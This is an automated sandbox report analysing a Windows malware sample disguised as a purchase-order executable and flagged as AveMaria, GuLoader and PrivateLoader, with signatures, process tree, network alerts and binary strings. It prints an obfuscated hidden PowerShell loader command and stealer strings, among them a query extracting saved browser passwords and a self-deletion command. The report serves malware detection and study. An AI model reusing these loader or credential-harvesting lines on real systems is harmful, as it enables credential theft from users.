Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO2737478834ORDER.exe

Overview

General Information

Sample name:PO2737478834ORDER.exe
Analysis ID:1445942
MD5:6d84fe81c98c02205cc129f68aca4529
SHA1:cf805bfa98d12c72a2f355cf1743de9ca7b8d12c
SHA256:987da2feba47f44c619720682eb25199eb13aa4dddd5759c37fa943c569d30be
Tags:exe
Infos:

Detection

AveMaria, GuLoader, PrivateLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AveMaria stealer
Yara detected GuLoader
Yara detected PrivateLoader
AI detected suspicious sample
Contains functionality to hide user accounts
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Increases the number of concurrent connection per server for Internet Explorer
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Powershell drops PE file
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO2737478834ORDER.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\PO2737478834ORDER.exe" MD5: 6D84FE81C98C02205CC129F68ACA4529)
    • powershell.exe (PID: 7852 cmdline: "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7988 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 6536 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_AveMaria_31d2bce9unknownunknown
      • 0x3028:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
      • 0x1910:$a2: SMTP Password
      • 0xb50:$a3: select signon_realm, origin_url, username_value, password_value from logins
      • 0x2eb0:$a5: for /F "usebackq tokens=*" %%A in ("
      • 0x1340:$a6: \Torch\User Data\Default\Login Data
      • 0x1eac:$a8: "os_crypt":{"encrypted_key":"
      • 0x17d8:$a10: \logins.json
      • 0x1e24:$a11: Accounts\Account.rec0
      • 0x2c50:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
      0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
        00000002.00000002.1779698085.000000000A28F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Click to see the 2 entries

          System Summary

          barindex
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7852, TargetFilename: C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72\PO2737478834ORDER.exe
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7852, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 7988, ProcessName: cmd.exe
          Source: Registry Key setAuthor: frack113: Data: Details: 10, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 6536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)", CommandLine: "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO2737478834ORDER.exe", ParentImage: C:\Users\user\Desktop\PO2737478834ORDER.exe, ParentProcessId: 7752, ParentProcessName: PO2737478834ORDER.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)", ProcessId: 7852, ProcessName: powershell.exe
          Timestamp:05/22/24-20:08:53.293761
          SID:2852347
          Source Port:56372
          Destination Port:78
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/22/24-20:08:53.598499
          SID:2852350
          Source Port:78
          Destination Port:56372
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/22/24-20:08:53.874038
          SID:2852354
          Source Port:78
          Destination Port:56372
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/22/24-20:08:53.600199
          SID:2852355
          Source Port:56372
          Destination Port:78
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/22/24-20:08:53.600199
          SID:2839089
          Source Port:56372
          Destination Port:78
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/22/24-20:08:53.600199
          SID:2852352
          Source Port:56372
          Destination Port:78
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/22/24-20:08:53.222242
          SID:2852346
          Source Port:78
          Destination Port:56372
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Source: C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72\PO2737478834ORDER.exeReversingLabs: Detection: 13%
          Source: PO2737478834ORDER.exeReversingLabs: Detection: 13%
          Source: Yara matchFile source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: PO2737478834ORDER.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: PO2737478834ORDER.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.1773990264.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: vcruntime140.i386.pdb source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843060413.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817480011.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2491846197.000000006D57F000.00000002.00000001.01000000.0000000E.sdmp, wab.exe, 0000000D.00000003.1817722969.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817541628.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845212265.0000000004F78000.00000004.00000020.00020000
          Source: Binary string: vcruntime140.i386.pdbGCTL source: wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843060413.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcp140.i386.pdbGCTL source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819499640.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819411927.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819552866.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819084006.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1824994886.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1825691579.0000000021882000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1832273738.0000000021AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842736291.0000000021BBF000.00000
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.1767627861.0000000003484000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: wab.exe, 0000000D.00000003.1784170585.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1784248802.0000000004F53000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: wab.exe, 0000000D.00000003.1784170585.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1784248802.0000000004F53000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: wab.exe, wab.exe, 0000000D.00000003.1809268507.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489782030.0000000021509000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809482259.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489600297.000000002135E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809717244.0000000021475000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809608585.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489686837.00000000213E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcp140.i386.pdb source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819499640.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819411927.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819552866.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819084006.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1824994886.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1825691579.0000000021882000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1832273738.0000000021AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842736291.0000000021BBF000.00000004.
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838682819.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838509091.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838592180.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1837322407.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1837322407.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1837800667.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1837599869.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842736291.0000000021BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838438880.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839489603.0000000021B56000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819029510.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818954283.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492817403.000000006FE89000.00000002.00000001.01000000.0000000B.sdmp, wab.exe, 0000000D.00000003.1824994886.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1825691579.0000000021882000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1832273738.0000000021AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 